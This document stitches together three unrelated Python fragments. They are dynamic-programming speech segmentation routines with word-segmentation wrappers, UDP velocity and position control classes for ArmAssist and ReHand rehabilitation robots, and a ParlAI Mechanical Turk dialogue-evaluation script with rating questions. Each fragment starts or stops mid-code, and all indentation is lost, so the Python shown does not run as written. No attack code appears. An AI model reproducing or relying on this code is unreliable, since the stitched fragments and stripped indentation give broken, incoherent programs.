boundaries = np.zeros(n_frames, dtype=bool)
boundaries[-1] = True
alphas = np.ones(n_frames)
alphas[0] = 0.0
# Forward filtering
i = 0
for t in range(1, n_frames):
alphas[t] = np.min(
costs[i:i + t] + alphas[:t]
)
i += t
# print("alphas: {}".format(alphas))
# Backward segmentation
t = n_frames
summed_cost = 0.0
while True:
i = int(0.5*(t - 1)*t)
q_t_min_list = (
costs[i:i + t] + alphas[:t]
)
q_t_min_list = q_t_min_list[::-1]
q_t = np.argmin(q_t_min_list) + 1
# print("-"*39)
# print("t = {}".format(t))
# print("q_t_min_list: {}".format(q_t_min_list))
# print("arg min: {}".format(q_t))
# print("Cost: {:.4f}".format(costs[i + t - q_t]))
summed_cost += costs[i + t - q_t]
if t - q_t - 1 < 0:
break
boundaries[t - q_t - 1] = True
t = t - q_t
# print("Utterance loss: {:.4f}".format(summed_cost))
return summed_cost, boundaries
def dp_penalized(embedding, z, n_min_frames=0, n_max_frames=15,
dur_weight=20**2, dur_weight_func=neg_chorowski, model_eos=False):
# Hyperparameters
# count_weight = 0
# Distances between each z and each embedding (squared Euclidean)
embedding_distances = distance.cdist(z, embedding, metric="sqeuclidean")
# print("embedding_distances shape: {}".format(embedding_distances.shape))
# Costs for segment intervals
segment_intervals = get_segment_intervals(z.shape[0], n_max_frames)
costs = np.inf*np.ones(len(segment_intervals))
i_eos = segment_intervals[-1][-1]
for i_seg, interval in enumerate(segment_intervals):
if interval is None:
continue
i_start, i_end = interval
dur = i_end - i_start
if dur < n_min_frames:
continue
cost = np.min(
np.sum(embedding_distances[i_start:i_end, :], axis=0)
) + dur_weight*dur_weight_func(dur) # + count_weight
# End-of-sequence
if model_eos:
alpha = 0.1
K = 50
if i_end == i_eos:
cost += -np.log(alpha)
else:
cost += -np.log((1 - alpha)/K)
costs[i_seg] = cost
# Viterbi segmentation
summed_cost, boundaries = custom_viterbi(costs, z.shape[0])
# Code assignments
segmented_codes = []
j_prev = 0
for j in np.where(boundaries)[0]:
i_start = j_prev
i_end = j + 1
code = np.argmin(np.sum(embedding_distances[i_start:i_end, :], axis=0))
segmented_codes.append((i_start, i_end, code))
j_prev = j + 1
return boundaries, segmented_codes
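# Illustrative sketch (not part of the original module): running dp_penalized on
# random data with a hypothetical codebook of K=5 codes and dimensionality D=4.
def _example_dp_penalized():
    rng = np.random.RandomState(0)
    embedding = rng.randn(5, 4)  # K codes of dimensionality D
    z = rng.randn(20, 4)         # one utterance: 20 frames of dimensionality D
    boundaries, segmented_codes = dp_penalized(
        embedding, z, n_max_frames=15, dur_weight=3
    )
    # boundaries is a bool vector with True at the last frame of each segment;
    # segmented_codes is a list of (start_frame, end_frame, code) tuples.
    return boundaries, segmented_codes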
def dp_penalized_hsmm(embedding, z, n_min_frames=0, n_max_frames=15,
dur_weight=20**2, dur_weight_func=neg_log_gamma, model_eos=False):
"""Segmentation using a hidden semi-Markov model (HSMM)."""
# Hyperparameters
# count_weight = 0
sigma = 1.0/dur_weight
D = z.shape[1]
# Distances between each z and each embedding (squared Euclidean)
embedding_distances = distance.cdist(z, embedding, metric="sqeuclidean")
# print("embedding_distances shape: {}".format(embedding_distances.shape))
# Costs for segment intervals
segment_intervals = get_segment_intervals(z.shape[0], n_max_frames)
costs = np.inf*np.ones(len(segment_intervals))
i_eos = segment_intervals[-1][-1]
for i_seg, interval in enumerate(segment_intervals):
if interval is None:
continue
i_start, i_end = interval
dur = i_end - i_start
if dur < n_min_frames:
continue
cost = (
1/(2*sigma**2)*np.min(
np.sum(embedding_distances[i_start:i_end, :], axis=0)
)
+ 0.5*dur*D*np.log(2*np.pi) + 0.5*dur*D*np.log(sigma**2)
+ dur_weight_func(dur) # + count_weight
)
# End-of-sequence
if model_eos:
alpha = 0.1 # 0.1
K = 50
if i_end == i_eos:
cost += -np.log(alpha)
else:
cost += -np.log((1 - alpha)/K)
costs[i_seg] = cost
# Viterbi segmentation
summed_cost, boundaries = custom_viterbi(costs, z.shape[0])
# Code assignments
segmented_codes = []
j_prev = 0
for j in np.where(boundaries)[0]:
i_start = j_prev
i_end = j + 1
code = np.argmin(np.sum(embedding_distances[i_start:i_end, :], axis=0))
segmented_codes.append((i_start, i_end, code))
j_prev = j + 1
return boundaries, segmented_codes
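# Note on the HSMM cost above: apart from the duration terms it is the negative
# log likelihood of the segment under a spherical Gaussian with variance
# sigma**2 centred on the best embedding e,
#   1/(2*sigma**2) * sum_t ||z_t - e||^2 + 0.5*dur*D*log(2*pi*sigma**2),
# which matches the three Gaussian terms in `cost`; dur_weight_func(dur) acts
# as a negative log duration prior and the optional EOS terms as negative log
# transition probabilities (alpha for ending, (1 - alpha)/K otherwise).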
#-----------------------------------------------------------------------------#
# N-SEG. CONSTRAINED DYNAMIC PROGRAMMING PENALIZED SEGMENTATION #
#-----------------------------------------------------------------------------#
def custom_viterbi_n_segments(costs, n_frames, n_segments):
"""
Viterbi segmentation of an utterance of length `n_frames` based on `costs`
constrained to produce `n_segments`.
Parameters
----------
costs : n_frames*(n_frames + 1)/2 vector
For t = 1, 2, ..., N the entries costs[i:i + t] contain the costs of
seq[0:t] up to seq[t - 1:t], with i = t*(t - 1)/2. Written out: costs =
[cost(seq[0:1]), cost(seq[0:2]), cost(seq[1:2]), cost(seq[0:3]), ...,
cost(seq[N-1:N])].
Return
------
(summed_cost, boundaries) : (float, vector of bool)
"""
# Initialise
boundaries = np.zeros(n_frames, dtype=bool)
boundaries[-1] = True
alphas = np.inf*np.ones((n_frames, n_segments + 1))
alphas[0, 0] = 0.0
# Forward filtering
i = 0
for t in range(1, n_frames):
for s in range(1, n_segments):
alphas[t, s] = np.min(
costs[i:i + t] + alphas[:t, s - 1]
) # vectorise (?)
i += t
# print("alphas: {}".format(alphas))
# Backward segmentation
t = n_frames
summed_cost = 0.0
s = n_segments
while True:
i = int(0.5*(t - 1)*t)
q_t_min_list = (
costs[i:i + t] + alphas[:t, s - 1]
)
q_t_min_list = q_t_min_list[::-1]
q_t = np.argmin(q_t_min_list) + 1
# print("-"*39)
# print("t = {}".format(t))
# print("q_t_min_list: {}".format(q_t_min_list))
# print("arg min: {}".format(q_t))
# print("Cost: {:.4f}".format(costs[i + t - q_t]))
summed_cost += costs[i + t - q_t]
if t - q_t - 1 < 0:
break
boundaries[t - q_t - 1] = True
t = t - q_t
s -= 1
# print("Utterance loss: {:.4f}".format(summed_cost))
return summed_cost, boundaries
def dp_penalized_n_seg(embedding, z, n_min_frames=0, n_max_frames=15,
dur_weight=0, n_frames_per_segment=7, n_min_segments=0,
dur_weight_func=neg_chorowski):
# Hyperparameters
n_segments = max(1, int(round(z.shape[0]/n_frames_per_segment)))
if n_segments < n_min_segments:
n_segments = n_min_segments
assert n_max_frames*n_segments >= z.shape[0]
# Distances between each z and each embedding (squared Euclidean)
embedding_distances = distance.cdist(z, embedding, metric="sqeuclidean")
# Costs for segment intervals
segment_intervals = get_segment_intervals(z.shape[0], n_max_frames)
costs = np.inf*np.ones(len(segment_intervals))
for i_seg, interval in enumerate(segment_intervals):
if interval is None:
continue
i_start, i_end = interval
dur = i_end - i_start
if dur < n_min_frames:
continue
# cost = np.min(
# np.sum(embedding_distances[i_start:i_end, :], axis=0)
# ) - dur_weight*(dur - 1)
cost = np.min(
np.sum(embedding_distances[i_start:i_end, :], axis=0)
) + dur_weight*dur_weight_func(dur)
costs[i_seg] = cost
# Viterbi segmentation
summed_cost, boundaries = custom_viterbi_n_segments(
costs, z.shape[0], n_segments
)
# Code assignments
segmented_codes = []
j_prev = 0
for j in np.where(boundaries)[0]:
i_start = j_prev
i_end = j + 1
code = np.argmin(np.sum(embedding_distances[i_start:i_end, :], axis=0))
segmented_codes.append((i_start, i_end, code))
j_prev = j + 1
return boundaries, segmented_codes
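# Usage note (sketch): here the number of segments is fixed up front from the
# average segment length, e.g. a T-frame utterance with n_frames_per_segment=7
# is forced into round(T/7) segments (at least n_min_segments), so dur_weight
# mainly shapes where the boundaries fall rather than how many there are.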
#-----------------------------------------------------------------------------#
# WORD SEGMENTATION ALGORITHMS #
#-----------------------------------------------------------------------------#
def ag(utterance_list, nruns=4, njobs=3, args="-n 100"):
from wordseg.algos import ag
n_max_symbols = 50 # 100
for i_utt in range(len(utterance_list)):
utterance = utterance_list[i_utt]
utterance_list[i_utt] = (
"_ ".join(utterance[:-1].split("_ ")[:n_max_symbols]) + "_"
)
return list(ag.segment(
utterance_list, nruns=nruns, njobs=njobs, args=args
))
# Other promising options:
# - threshold="absolute", dependency="ftp"
# - threshold="absolute", dependency="mi"
def tp(utterance_list, threshold="relative", dependency="ftp"):
from wordseg.algos import tp
import wordseg.algos
return list(
tp.segment(utterance_list, threshold=threshold, dependency=dependency)
)
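# Assumed utterance format for these wordseg wrappers (inferred from the "_ "
# splitting in ag() above, not from the wordseg documentation): each utterance
# is a string of symbols terminated by "_" and separated by spaces, e.g.
#   utterance_list = ["dh_ ax_ k_ ae_ t_", "s_ ae_ t_"]
#   segmented = tp(utterance_list)  # one segmented string per input utterance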
def rasanen15(utterance_list, n_max=9, words_count_fn="words.tmp"):
"""
The word decoding with n-grams approach of Räsänen et al. [Interspeech'15].
See | |
system
self._send_command('SetControlMode ArmAssist Global')
def set_trajectory_control(self): #trajectory control with global reference system
self._send_command('SetControlMode ArmAssist Trajectory')
def send_vel(self, vel):
vel = vel.copy()
# units of vel should be: [cm/s, cm/s, rad/s]
assert len(vel) == self.n_dof
# convert units to: [mm/s, mm/s, deg/s] to send them through UDP to the ArmAssist application
vel[0] *= cm_to_mm
vel[1] *= cm_to_mm
vel[2] *= rad_to_deg
# set max speed limits
faster_than_max_speed, = np.nonzero(np.abs(vel) > self.max_speed)
vel[faster_than_max_speed] = self.max_speed[faster_than_max_speed] * np.sign(vel[faster_than_max_speed])
self.debug = True
if self.debug:
# print "vel sent to armassist"
# print vel
if faster_than_max_speed.any():
print ('faster_than_max_speed')
print (faster_than_max_speed)
print ("speed set to: ")
print (vel)
self._send_command('SetSpeed ArmAssist %f %f %f\r' % tuple(vel))
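# Note on the conversion constants used above (assumed values, defined
# elsewhere in this module): cm_to_mm = 10.0 and rad_to_deg = 180.0/np.pi, so
# e.g. a commanded psi velocity of 0.1 rad/s is sent as roughly 5.73 deg/s.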
# get raw position
def get_pos_raw(self):
# udp_feedback_client takes care of converting sensor data to cm or rad, as appropriate for the DOF
#get the last points of data of the armassist and low-pass filter
return np.array(tuple(self.source.read(n_pts=1)['data'][self.pos_state_names][0]))
# get filtered position
def get_pos(self):
return np.array(tuple(self.source.read(n_pts=1)['data_filt'][self.pos_state_names][0]))
# calculate vel from raw position
def get_vel_raw(self):
recent_pos_data = self.source.read(n_pts=2)
pos = recent_pos_data['data'][self.pos_state_names]
ts = recent_pos_data['ts']
delta_pos = np.array(tuple(pos[1])) - np.array(tuple(pos[0]))
delta_ts = ts[1] - ts[0]
vel = delta_pos / delta_ts
#filt_vel = np.array([self.vel_command_lpfs[k](vel[k]) for k in range(self.n_dof)]).ravel() #nerea --> to test!
if ts[0] != 0 and any(np.isnan(v) for v in vel):
print ("WARNING -- delta_ts = 0 in AA vel calculation:", vel)
for i in range(3):
if np.isnan(vel[i]):
vel[i] = 0
return vel
#calculate vel from raw position and filter
def get_vel(self):
recent_pos_data = self.source.read(n_pts=2)
pos = recent_pos_data['data'][self.pos_state_names]
ts = recent_pos_data['ts']
delta_pos = np.array(tuple(pos[1])) - np.array(tuple(pos[0]))
delta_ts = ts[1] - ts[0]
vel = delta_pos / delta_ts
if ts[0] != 0 and any(np.isnan(v) for v in vel):
print ("WARNING -- delta_ts = 0 in AA vel calculation:", vel)
for i in range(3):
if np.isnan(vel[i]):
vel[i] = 0
# skip the filter when vel contains NaNs (e.g. from the first position sample, which is always NaN): once a NaN enters the filter, all following filtered values would also be NaN
if np.any(np.isnan(vel)):
self.n_getpos_iter = self.n_getpos_iter +1
vel_filt = vel
else:
vel_filt = np.array([self.vel_filter[k](vel[k]) for k in range(self.n_dof)]).ravel()
return vel_filt
def send_pos(self, pos, time):
pos = pos.copy()
# units of pos should be: [cm, cm, rad]
assert len(pos) == 3
# convert units to: [mm, mm, deg]
pos[0] *= cm_to_mm
pos[1] *= cm_to_mm
pos[2] *= rad_to_deg
# mode 1: the forearm angle (psi) stays the same as it is. mode 2: psi will move according to the determined value
mode = 2
pos_command = np.zeros(5)
pos_command[0] = pos[0]
pos_command[1] = pos[1]
pos_command[2] = pos[2]
pos_command[3] = time
pos_command[4] = mode
print ("pos")
print (pos)
print ("time")
print (time)
self._send_command('SetPosition ArmAssist %f %f %f %f %f\r' % tuple(pos_command))
def enable(self):
self._send_command('SetControlMode ArmAssist Global\r')
def disable(self):
self._send_command('SetControlMode ArmAssist Disable\r')
def enable_watchdog(self, timeout_ms):
print ('ArmAssist watchdog not enabled, doing nothing')
def send_traj(self, pos_vel):
pos_vel = pos_vel.copy()
# pos_vel contains positions and velocities: [x, y, psi, vx, vy, vpsi]
assert len(pos_vel) == 6
# units are already in [mm/s, mm/s, rad/s]
# convert values to integers to reduce noise
#pos_vel_int = np.rint(pos_vel)
pos_vel_int = pos_vel
print ("trajectory sent to AA")
print ("x y psi vx vy vpsi")
print (pos_vel_int)
traj_command = np.zeros(6)
traj_command[0] = pos_vel_int[0]
traj_command[1] = pos_vel_int[1]
traj_command[2] = pos_vel_int[2]
traj_command[3] = pos_vel_int[3]
traj_command[4] = pos_vel_int[4]
traj_command[5] = pos_vel_int[5]
self._send_command('SetTrajectory ArmAssist %d %d %d %d %d %d\r' % tuple(traj_command))
class DummyPlantUDP(object):
drive_velocity_raw = np.array([0,0,0])
drive_velocity_sent = np.array([0,0,0])
drive_velocity_sent_pre_safety = np.array([0,0,0])
pre_drive_state = np.array([0, 0, 0])
def init(self):
pass
def enable(self):
pass
def start(self):
pass
def stop(self):
pass
def write_feedback(self):
pass
def get_pos_raw(self):
return np.array([0,0,0])
def get_pos(self):
return np.array([0,0,0])
def get_vel_raw(self):
return np.array([0,0,0])
def get_vel(self):
return np.array([0,0,0])
class ReHandPlantUDP(BasePlantUDP):
'''Sends velocity commands and receives feedback over UDP. Can be used
with either the real or simulated ReHand.
'''
ssm_cls = ismore_bmi_lib.StateSpaceReHand
addr = settings.REHAND_UDP_SERVER_ADDR
feedback_data_cls = udp_feedback_client.ReHandData
data_source_name = 'rehand'
n_dof = 4
plant_type = 'ReHand'
vel_gain = np.array([rad_to_deg, rad_to_deg, rad_to_deg, rad_to_deg])
max_pos_vals = np.array([60, 60, 60, 90], dtype=np.float64) # degrees
min_pos_vals = np.array([25, 25, 25, 25], dtype=np.float64) # degrees
max_speed = np.array([np.inf, np.inf, np.inf, np.inf], dtype=np.float64) # degrees/sec
#max_speed = np.array([15., 15., 15., 15.], dtype=np.float64) # degrees/sec
feedback_file = open(os.path.expandvars('$HOME/code/bmi3d/log/rehand.txt'), 'w')
def send_vel(self, vel):
vel = vel.copy()
# units of vel should be: [rad/s, rad/s, rad/s, rad/s]
assert len(vel) == self.n_dof
# convert units to: [deg/s, deg/s, deg/s, deg/s]
vel *= rad_to_deg
#filt_vel = np.array([self.vel_command_lpfs[k](vel[k]) for k in range(self.n_dof)]).ravel()
# set max speed limits
faster_than_max_speed, = np.nonzero(np.abs(vel) > self.max_speed)
vel[faster_than_max_speed] = self.max_speed[faster_than_max_speed] * np.sign(vel[faster_than_max_speed])
self.debug = True
if self.debug:
# print 'filt_vel in plants in degrees'
# print filt_vel #*np.array([deg_to_rad, deg_to_rad, deg_to_rad, deg_to_rad])
if faster_than_max_speed.any():
print ('faster_than_max_speed')
print (faster_than_max_speed)
print ("speed set to: ")
print (vel)
# self.plant.enable() #when we send vel commands always enable the rehand motors
# self._send_command('SystemEnable ReHand\r')
self._send_command('SetSpeed ReHand %f %f %f %f\r' % tuple(vel))
def get_vel_raw(self):
return np.array(tuple(self.source.read(n_pts=1)['data'][self.vel_state_names][0]))
def get_vel(self):
return np.array(tuple(self.source.read(n_pts=1)['data_filt'][self.vel_state_names][0]))
def enable(self):
self._send_command('SystemEnable ReHand\r')
def disable(self):
self._send_command('SystemDisable ReHand\r')
def diff_enable(self,DoFs):
self._send_command('DiffEnable ReHand %i %i %i %i\r' % tuple(DoFs))
def get_enable_state(self):
self._send_command('GetEnableState ReHand\r')
def enable_watchdog(self, timeout_ms):
self._send_command('WatchDogEnable ReHand %d\r' % timeout_ms)
def get_pos_raw(self):
# udp_feedback_client takes care of converting sensor data to cm or rad, as appropriate for the DOF
return np.array(tuple(self.source.read(n_pts=1)['data'][self.pos_state_names][0]))
#get pos filtered
def get_pos(self):
return np.array(tuple(self.source.read(n_pts=1)['data_filt'][self.pos_state_names][0]))
################################################
class BasePlantIsMore(Plant):
# define in subclasses!
aa_plant_cls = None
rh_plant_cls = None
safety_grid = None
both_feedback_str = ''
def __init__(self, *args, **kwargs):
self.aa_plant = self.aa_plant_cls()
self.rh_plant = self.rh_plant_cls()
self.drive_velocity_raw = np.zeros((7,))
self.drive_velocity_sent= np.zeros((7,))
self.drive_velocity_sent_pre_safety = np.zeros((7, ))
self.pre_drive_state = np.zeros((7, ))
self.prev_vel_bl_aa = np.zeros((3, ))*np.NaN
self.prev_vel_bl_rh = np.zeros((4, ))*np.NaN
self.accel_lim_armassist = np.inf #0.8
self.accel_lim_psi = np.inf #0.16
self.accel_lim_rehand = np.inf #0.16
def init(self):
self.aa_plant.init()
self.rh_plant.init()
def start(self):
self.aa_plant.start()
self.rh_plant.start()
self.ts_start_data = time.time()
def stop(self):
self.aa_plant.stop()
self.rh_plant.stop()
def last_data_ts_arrival(self):
return {
'ArmAssist': self.aa_plant.last_data_ts_arrival(),
'ReHand': self.rh_plant.last_data_ts_arrival(),
}
def send_vel(self, vel):
self.aa_plant.send_vel(vel[0:3])
self.rh_plant.send_vel(vel[3:7])
def get_pos_raw(self):
aa_pos = self.aa_plant.get_pos_raw()
rh_pos = self.rh_plant.get_pos_raw()
return np.hstack([aa_pos, rh_pos])
def get_pos(self):
aa_pos = self.aa_plant.get_pos()
rh_pos = self.rh_plant.get_pos()
return np.hstack([aa_pos, rh_pos])
def get_vel_raw(self):
aa_vel = self.aa_plant.get_vel_raw()
rh_vel = self.rh_plant.get_vel_raw()
return np.hstack([aa_vel, rh_vel])
def get_vel(self):
aa_vel = self.aa_plant.get_vel()
rh_vel = self.rh_plant.get_vel()
return np.hstack([aa_vel, rh_vel])
def enable(self):
self.aa_plant.enable()
self.rh_plant.enable()
def disable(self):
self.aa_plant.disable()
self.rh_plant.disable()
def drive(self, decoder):
# print self.aa_plant.aa_xy_ix: [0, 1]
# print self.aa_plant.aa_psi_ix: [2]
# print self.rh_plant.rh_pfings: [0, 1, 2]
# print self.rh_plant.rh_pron_ix: [3]
vel = decoder['qdot']
vel_bl = vel.copy()
current_state = self.get_pos()
self.pre_drive_state = current_state.copy()
self.drive_velocity_raw = vel_bl.copy()
if self.blocking_joints is not None:
vel_bl[self.blocking_joints] = 0
vel_bl_aa0 = vel_bl[0:3].copy()
vel_bl_rh0 = vel_bl[3:7].copy()
### Accel Limit Velocitites ###
# if not np.all(np.isnan(np.hstack((self.prev_vel_bl_aa, self.prev_vel_bl_rh)))):
# aa_output_accel = vel_bl_aa - self.prev_vel_bl_aa
# rh_output_accel = vel_bl_rh - self.prev_vel_bl_rh
# ### AA XY ###
# for i in np.arange(2):
# if aa_output_accel[i] > self.accel_lim_armassist:
# vel_bl_aa[i] = self.prev_vel_bl_aa[i] + self.accel_lim_armassist
# elif aa_output_accel[i] < -1*self.accel_lim_armassist:
# vel_bl_aa[i] = self.prev_vel_bl_aa[i] - self.accel_lim_armassist
# ### AA PSI ###
# if aa_output_accel[2] > self.accel_lim_psi:
# vel_bl_aa[2] = self.prev_vel_bl_aa[2] + self.accel_lim_psi
# elif aa_output_accel[2] < -1*self.accel_lim_psi:
# vel_bl_aa[2] = self.prev_vel_bl_aa[2] - self.accel_lim_psi
# ### RH All ###
# for i in np.arange(4):
# if rh_output_accel[i] > self.accel_lim_rehand:
# vel_bl_rh[i] = self.prev_vel_bl_rh[i] + self.accel_lim_rehand
# elif rh_output_accel[i] < -1*self.accel_lim_rehand:
# vel_bl_rh[i] = self.prev_vel_bl_rh[i] - self.accel_lim_rehand
### Add Attractor ###
if self.safety_grid is not None:
attractor_point_aa = self.safety_grid.attractor_point[:3]
attractor_point_rh = self.safety_grid.attractor_point[3:]
vel_bl_aa_pull = self.attractor_speed_const*(attractor_point_aa - current_state[:3])/0.05
vel_bl_rh_pull = self.attractor_speed_const*(attractor_point_rh - current_state[3:])/0.05
vel_bl_aa = vel_bl_aa0 + vel_bl_aa_pull.copy()
vel_bl_rh = vel_bl_rh0 + vel_bl_rh_pull.copy()
else:
vel_bl_aa = vel_bl_aa0
vel_bl_rh = vel_bl_rh0
### LPF Filter Velocities ###
for s, state in enumerate(['aa_vx', 'aa_vy', 'aa_vpsi']):
vel_bl_aa[s] = self.command_lpfs[state](vel_bl_aa[s])
if np.isnan(vel_bl_aa[s]):
vel_bl_aa[s] = 0
for s, state in enumerate(['rh_vthumb', 'rh_vindex', 'rh_vfing3', 'rh_vprono']):
vel_bl_rh[s] = self.command_lpfs[state](vel_bl_rh[s])
if np.isnan(vel_bl_rh[s]):
vel_bl_rh[s] = 0
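# Summary of the drive pipeline implemented above: raw decoder velocity ->
# zero any blocking_joints -> add an attractor pull towards
# safety_grid.attractor_point (scaled by attractor_speed_const over what
# appears to be a 50 ms update step, hence the /0.05) -> per-DoF low-pass
# filtering with a NaN guard -> safety clamping below.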
self.drive_velocity_sent_pre_safety = np.hstack(( vel_bl_aa.copy(), vel_bl_rh.copy()))
#If the next position is outside of safety then damp velocity to only go to | |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from parlai.core.agents import create_agent_from_shared
from parlai.mturk.core.legacy_2018.agents import TIMEOUT_MESSAGE
from parlai.core.worlds import validate, MultiAgentDialogWorld
from parlai.mturk.core.legacy_2018.worlds import MTurkOnboardWorld
from parlai.core.message import Message
from joblib import Parallel, delayed
import numpy as np
import os
import json
import random
import time
import torch
import copy
# ASK_DETAILED decides whether we ask human evaluators to select individual
# utterances they found bad. The See et al. 2019 paper has this as True; it is
# set False in later works as it adds overhead that isn't used in analysis.
ASK_DETAILED = False
# INSTRUCTIONS
ONBOARD_MSG = '\nWelcome! Below is your persona \
(you can find it on the left side of the chat)\n \
When you are ready to start your conversation, \
click the "I am ready, continue" button below\n'
START_MSG = '\nSuccessfully matched. \
Now let\'s get to know each other through the chat! \n\
You need to finish at least <b>{} chat turns</b>, \
after which you can click the "Done" button to end the chat. \n \
<b>You can track your character description on the left.</b> \n\
<span style="color:blue"><b>Please try to speak to the other person \
as if you are the character assigned.</b></span> \n \
<span style="color:blue"><b>Do not trivially copy \
the character descriptions into the message.</b></span> \n \
<span style="color:red"><b>If you see this message twice, please \
return the hit and accept the next one.</b></span>'
CHAT_NOT_DONE_MSG = 'Sorry, we need at least <b>{} more turn(s)</b> to finish. \
Please send a new message:'
TIMEOUT_MSG = '<b> The other person has timed out. \
Please click the "Done with this HIT" button below to finish this HIT.\
</b>'
EXCEED_MIN_TURNS_MSG = '\n {} chat turns finished! \n \
You can click the "Done" button to end the chat if it\'s your turn '
UNEXPECTED_DISCONNECTION_MSG = 'The other worker unexpectedly disconnected. \n \
Please click <span style="color:blue"><b>Done with this HIT</b>\
</span> button below to finish this HIT.'
CHAT_ENDED_MSG = 'One of you ended the chat. Thanks for your time! \n\
Please click <span style="color:blue"><b>Done with this HIT</b>\
</span> button below to finish this HIT.'
WAITING_MSG = 'Please wait while we match you with another worker...'
NAN_MSG = 'The score you entered must be in [1, 2, 3, 4, 5]. Please \
try again:'
TOO_SHORT_MSG = 'Your message is too short, please make it more than \
<b><span style="color:red">{} words</span></b>.'
TOO_LONG_MSG = 'Your message is too long, please make it less than \
<b><span style="color:red">{} words</span></b>.'
# CHOOSING A TOPIC
PICK_TOPIC_MSG = 'To start, please select a topic on the left, then click the \
\'Pick Topic\' button.'
AFTER_PICK_TOPIC_MSG = 'Thank you for selecting a topic! Now, begin the \
conversation with your partner about the topic.'
PLEASE_WAIT_MSG = 'Your partner will choose a discussion topic. Click the \
button below when you are ready to continue.'
# EVALUATION
OTHER_AGENT_FINISHED_MSG = '<b><span style="color:red">This chat is \
done!</span></b> Please click \
<span style="color:blue"><b>Done with this HIT</b></span> button below \
to finish this HIT.'
# Engagingness
ENGAGINGNESS_MSGS = [
'How much did you enjoy talking to this user?',
# 'How likely would you be to continue talking to this user?',
]
ENGAGINGNESS_CHOICES = ['not at all', 'a little', 'somewhat', 'a lot']
INTERESTINGNESS_MSGS = ['How interesting or boring did you find this conversation?']
INTERESTINGNESS_CHOICES = [
'Very boring',
'A little boring',
'A little interesting',
'Very interesting',
]
LISTENING_MSGS = ['How much did the user seem to pay attention to what you said?']
LISTENING_CHOICES = [
'Always ignored what I said',
'Mostly ignored what I said',
'Mostly paid attention to what I said',
'Always paid attention to what I said',
]
INQUISITIVENESS_MSGS = ['How much did the user try to get to know you?']
INQUISITIVENESS_CHOICES = [
"Didn't ask about me at all",
"Asked about me some",
"Asked about me a good amount",
"Asked about me too much",
]
REPETITIVENESS_MSGS = [
'How repetitive was this user?',
'Please select the sentences that you found repetitive:',
]
REPETITIVENESS_CHOICES = [
'Repeated themselves over and over',
'Sometimes said the same thing twice',
'Always said something new',
]
# Fluency
FLUENCY_MSGS = [
"How naturally did this user speak English?",
'Please select the sentences containing unnatural English:',
]
FLUENCY_CHOICES = [
'Very unnatural',
'Mostly unnatural',
'Mostly natural',
'Very natural',
]
# Consistency
CONSISTENCY_MSGS = [
"How often did this user say something which did <b>NOT</b> make sense?",
("Please select the sentences which did <b>NOT</b> make sense:"),
]
CONSISTENCY_CHOICES = [
'Everything made perfect sense',
"Some responses didn't make sense",
"Most responses didn't make sense",
'Never made any sense',
]
HUMANNESS_MSGS = ['Do you think this user is a bot or a human?']
HUMANNESS_CHOICES = [
'Definitely a bot',
'Probably a bot',
'Probably a human',
'Definitely a human',
]
# Persona
PERSONA_MSG = (
'Which prompt (character) do you think the other user was '
+ 'given for this conversation? \n 1.<br> {} <br> 2.<br> {}'
)
PERSONA_CHOICES = ['1', '2']
def _strip_tensors(act):
"""
Remove all tensor objects from an act to ensure we don't try to serialize them.
"""
return Message({k: v for k, v in act.items() if not torch.is_tensor(v)})
def _random_delay():
time.sleep(max(0, 4 + np.random.randn() * 0.5))
def uppercase(string):
if len(string) == 0:
return string
else:
return string[0].upper() + string[1:]
class PersonasGenerator(object):
def __init__(self, opt):
self.text_file = self._path(opt)
self.personas = self.extract_personas()
def _path(self, opt):
# Build the data if it doesn't exist.
persona = opt['persona_type']
datatype = opt['persona_datatype'].split(':')[0]
dt = datatype + '_' + persona
if datatype == 'test':
return os.path.join(
opt['parlai_home'],
'parlai_internal/projects/convai2/test_set',
dt + '_original_no_cands.txt',
)
return os.path.join(opt['datapath'], 'ConvAI2', dt + '_original_no_cands.txt')
def extract_personas(self):
personas = []
with open(self.text_file, 'r') as f:
lines = f.readlines()
new_persona = []
for line in lines:
if 'persona: ' in line:
new_persona.append(line.split('persona: ')[1].replace('\n', ''))
else:
if new_persona:
personas.append(new_persona)
new_persona = []
return personas
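# Sketch of the expected persona file format (an assumption based on the
# 'persona: ' split above, consistent with the ConvAI2 original_no_cands
# files):
#   1 your persona: i like to ski.
#   2 your persona: i am an artist.
#   3 hi , how are you doing ?
# Consecutive 'persona: ' lines are grouped into one persona; any other line
# closes the current group.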
def get_persona(self):
return random.choice(self.personas)
class PersonaAssignWorld(MTurkOnboardWorld):
"""
A world that assigns a persona to an agent.
"""
def __init__(self, opt, mturk_agent):
self.max_persona_time = opt['max_persona_time']
self.human_eval = opt['human_eval']
super().__init__(opt, mturk_agent)
def parley(self):
personas = self.mturk_agent.personas_generator.get_persona()
self.mturk_agent.personas = personas
if not self.human_eval:
# get model personas
model_personas = self.mturk_agent.personas_generator.get_persona()
while model_personas == personas:
model_personas = self.mturk_agent.personas_generator.get_persona()
self.mturk_agent.model_personas = model_personas
persona_text = ''
for persona in personas:
persona_text += '<b><span style="color:blue">' '{}\n</span></b>'.format(
persona.strip()
)
self.mturk_agent.observe(
{
'id': 'SYSTEM',
'show_persona': True,
'text': ONBOARD_MSG + '<br>' + persona_text + '<br>',
}
)
act = self.mturk_agent.act(timeout=self.max_persona_time)
timed_out = self.check_timeout(act)
if timed_out:
self.episodeDone = True
return
def check_timeout(self, act):
if 'text' in act:
if (
(act['text'] == '[TIMEOUT]')
or (act['text'] == '[RETURNED]')
or (act['text'] == '[DISCONNECT]')
):
return True
return False
class ControllableDialogEval(MultiAgentDialogWorld):
def __init__(
self,
opt,
agents=None,
shared=None,
num_turns=6,
max_resp_time=120,
model_agent_opt=None,
world_tag='',
agent_timeout_shutdown=120,
model_config=None,
):
# TURN CONTROL
self.opt = opt
self.turn_idx = 0
self.n_turn = num_turns
self.chat_done = False
self.other_first = random.choice([True, False])
self.model_config = model_config
# DATA
self.start_time = time.time()
self.dialog = []
self.dialog_list = []
self.engagingness_scores = []
self.interestingness_scores = []
self.listening_scores = []
self.consistency_scores = []
self.inquisitiveness_scores = []
self.humanness_scores = []
self.repetitiveness_scores = []
self.fluency_scores = []
self.persona_scores = []
self.task_type = 'sandbox' if opt['is_sandbox'] else 'live'
self.world_tag = world_tag
super().__init__(opt, agents, shared)
# MODEL AGENT SET UP
if model_agent_opt is not None:
self.model_agent = create_agent_from_shared(model_agent_opt)
else:
# case where we test against a human
self.model_agent = None
# TIMEOUT PROTOCOLS
self.max_resp_time = max_resp_time # in secs
self.agent_timeout_shutdown = agent_timeout_shutdown
# PERSONAS
